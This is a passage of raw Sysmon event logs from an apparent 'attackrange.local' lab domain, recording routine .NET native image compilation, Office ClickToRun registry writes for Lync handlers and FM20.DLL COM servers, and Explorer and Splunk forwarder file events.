b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000075942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.061{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBE8-607E-380D-00000000BB01}1388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Microsoft.Lync.15TelProtocol.1\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000075940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Microsoft.Lync.15Join.1\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 10341000x800000000000000075939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.030{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBE8-607E-380D-00000000BB01}1388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.030{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE8-607E-380D-00000000BB01}1388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000075937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.030{A7A01FEF-C0A6-607E-8105-00000000BB01}836ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000015.dbMD5=B7627E447C628FA3505343CD11FB60AC,SHA256=37C696554985681B7472019CB11CB6A1F88642E0D48DA6BE255FD1E282AB7C38,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000075936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.030{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Microsoft.Lync.15ClassicJoin.1\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 23542300x800000000000000075935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.030{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2AAC76436E4AACED5ADB7C4C7DE9A03B,SHA256=FBF78727B4F4459D4994C05456C80F4F4DF116753A8EB166E29514B5B261925F,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000075934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.014{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\ma-chan\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000075933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Lync15classic\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 23542300x800000000000000050313Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:44.520{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2285032DECC9B156EC53DE1D70B4EAD2,SHA256=023895B16DF58D3BED7F8BBA64D66DC156FCEE88958DB8761AC786C8FBAF00FD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:45.967{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBE9-607E-410D-00000000BB01}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:45.952{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBE9-607E-410D-00000000BB01}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:45.952{A7A01FEF-EBDA-607E-C60C-00000000BB01}35121112C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE9-607E-410D-00000000BB01}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000076101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:45.873{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBE9-607E-400D-00000000BB01}5536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:45.858{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBE9-607E-400D-00000000BB01}5536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:45.858{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE9-607E-400D-00000000BB01}5536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:45.780{A7A01FEF-EBE8-607E-3F0D-00000000BB01}6556NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BFTT050K7J\Microsoft.VisualBasic.Compatibility.ni.dll.auxMD5=CD00B51BCC86FF4EB0C12D45D8B5C7C6,SHA256=8ADA2B187D3A9E5E6EC532B976132F5B0A85967C4C74291240C1E38F89843C46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000076097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:45.780{A7A01FEF-EBE8-607E-3F0D-00000000BB01}6556NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BFTT050K7J\Microsoft.VisualBasic.Compatibility.ni.dllMD5=F64A0953E2307C0F32EB9697D0725B69,SHA256=F06BEB99E4569E755572A95CE04883FAE44E9FB23A58B5D9ABA22AA68282FBDD,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000076096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:45.764{A7A01FEF-C0A6-607E-8105-00000000BB01}836ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000016.dbMD5=1F6665AB2A00D823D9185D6AD83276BD,SHA256=598DE75921922F8367C99DD61CC080328E7485D92F188C2817036E889B601291,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000076095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:45.748{A7A01FEF-EBE8-607E-3F0D-00000000BB01}6556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\199c-0\Microsoft.VisualBasic.Compatibility.dll2021-04-20 14:57:45.748 13241300x800000000000000076094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{FDEA20DB-AC7A-42f8-90EE-82208B9B4FC0}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.686{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{FB453AD8-2EF4-44D3-98A8-8C6474E63CE4}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.670{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{F14E8B03-D080-4D3A-AEBA-355E77B20F3D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.655{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{EAE50EB0-4A62-11CE-BED6-00AA00611080}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.623{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{EA778DB4-CE69-4da5-BC1D-34E2168D5EED}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.608{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{E9729012-8271-4e1f-BC56-CF85F914915A}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{DFD181E0-5E2F-11CE-A449-00AA004A803D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.576{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{DD4CB8C5-F540-47ff-84D7-67390D2743CA}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.561{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{DCA0ED3C-B95D-490f-9C60-0FF3726C789A}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{D7053240-CE69-11CD-A777-00DD01143C57}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.452{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{9BDAC276-BE24-4F04-BB22-11469B28A496}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.436{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{978C9E23-D4B0-11CE-BF2D-00AA003F40D0}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.420{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{9432194C-DF54-4824-8E24-B013BF2B90E3}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{8BD21D60-EC42-11CE-9E0D-00AA006002F3}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.373{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{8BD21D50-EC42-11CE-9E0D-00AA006002F3}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{8BD21D40-EC42-11CE-9E0D-00AA006002F3}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.327{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{8BD21D30-EC42-11CE-9E0D-00AA006002F3}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.295{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{8BD21D20-EC42-11CE-9E0D-00AA006002F3}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.280{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{8BD21D10-EC42-11CE-9E0D-00AA006002F3}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{86F56B7F-A81B-478d-B231-50FD37CBE761}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{7931F65C-2564-4C19-AE71-E7DDFA008F6A}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{79176FB0-B7F2-11CE-97EF-00AA006D2776}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{787A2D6B-EF66-488D-A303-513C9C75C344}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.155{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{6E182020-F460-11CE-9BCD-00AA00608E01}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{6C1B3099-127A-4BE1-93BC-DD4771EEEF90}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.108{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{6C177EBD-C42D-4728-A04B-4131892EDBF6}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 